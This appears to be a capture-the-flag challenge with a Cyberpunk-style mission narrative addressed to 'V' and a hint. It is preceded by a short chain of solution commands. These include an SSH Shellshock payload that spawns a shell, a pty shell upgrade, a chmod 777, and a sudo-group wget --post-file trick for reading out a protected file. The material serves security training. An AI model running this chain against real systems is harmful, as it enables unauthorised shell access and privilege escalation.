chmod 777 mariadb
ssh puppet-master@ -p 2222 -i ~/.ssh/maintenance '() { :;}; /bin/sh -i'
python3 -c 'import pty; pty.spawn("/bin/sh")'
sudo -g zetatech-maintenance wget --post-file=tech.note
hint Netrunner 2/3: He seems to have a "ghost" in the shell
V, I got a mission for you!
We discoved a Netrunner who hack neural implants to create false memories. We spotted the target's interface on the Net at this address:
Find out who he is and a way to stop him.
Nice V! I owe you one!
But before we go to visit him, I would like to have a means of pressure.
Here is his maintenance access:
See what you can do and let me know.
You doing great!
But this access is not enough. See if you can get privileged access, the same used by Zetatech technician for maintenance.
It will allow us to unplug it in case of a glitch.